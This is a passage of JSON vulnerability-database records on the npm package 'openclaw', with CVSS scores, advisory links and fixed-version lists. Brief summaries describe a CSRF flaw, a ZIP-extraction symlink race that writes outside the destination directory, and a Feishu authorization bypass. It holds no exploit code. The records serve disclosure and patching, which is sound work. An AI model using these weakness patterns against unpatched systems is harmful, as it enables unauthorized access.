mhr7-2xmv-4c4q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41347","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41347"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-cross-site-request-forgery-via-missing-browser-origin-validation-in-http-operator-endpoints","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","sco
ring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-cross-site-request-forgery-via-missing-browser-origin-validation-in-http-operator-endpoints"},{"reference_url":"https://github.com/advisories/GHSA-mhr7-2xmv-4c4q","reference_id":"GHSA-mhr7-2xmv-4c4q","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mhr7-2xmv-4c4q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerabi
lity":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerabi
lity":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41347","GHSA-mhr7-2xmv-4c4q"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fekn-d6f3-xfa6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50639?format=json","vulnerability_id":"VCID-fjfw-xwxw-u3at","summary":"OpenClaw: ZIP extraction race could write outside destination via parent symlink rebind\nZIP extraction in OpenClaw could be raced into writing outside the intended destination directory via parent-directory symlink rebind between validation and 
write.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7dac9b05dd9d38dd3929637f26fa356fd8bdd107","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7dac9b05dd9d38dd3929637f26fa356fd8bdd107"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28483","reference_id":"CVE-2026-28483","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28483"},{"reference_url":"https://github.com/advisories/GHSA-r54r-wmmq-mh84","reference_id":"GHSA-r54r-wmmq-mh84","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r54r-wmmq-mh84"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r54r-wmmq-mh84","reference_id":"GHSA-r54r-wmmq-mh84","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r54r-wmmq-mh84"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1
1dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5
atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-a
ye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-g
ncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-n
twt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-t
k9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-x
zg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-28483","GHSA-r54r-wmmq-mh84"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fjfw-xwxw-u3at"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91206?format=json","vulnerability_id":"VCID-ftdn-9fum-cbe4","summary":"OpenClaw: Feishu reaction events could bypass group authorization and mention gating\n### Summary\n\nA Feishu reaction-originated synthetic event could misclassify a group conversation as `p2p` when the inbound reaction payload omitted `chat_type`. 
Authorization and mention-gating logic keyed off that incorrect chat type and evaluated the event as a direct message instead of a group message.\n\n### Impact\n\nThis could bypass `groupAllowFrom` and `requireMention` protections for reaction-derived events in Feishu group chats.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Reaction events now preserve the correct group context before authorization and mention-gate evaluation. Users should update to `2026.3.12` or 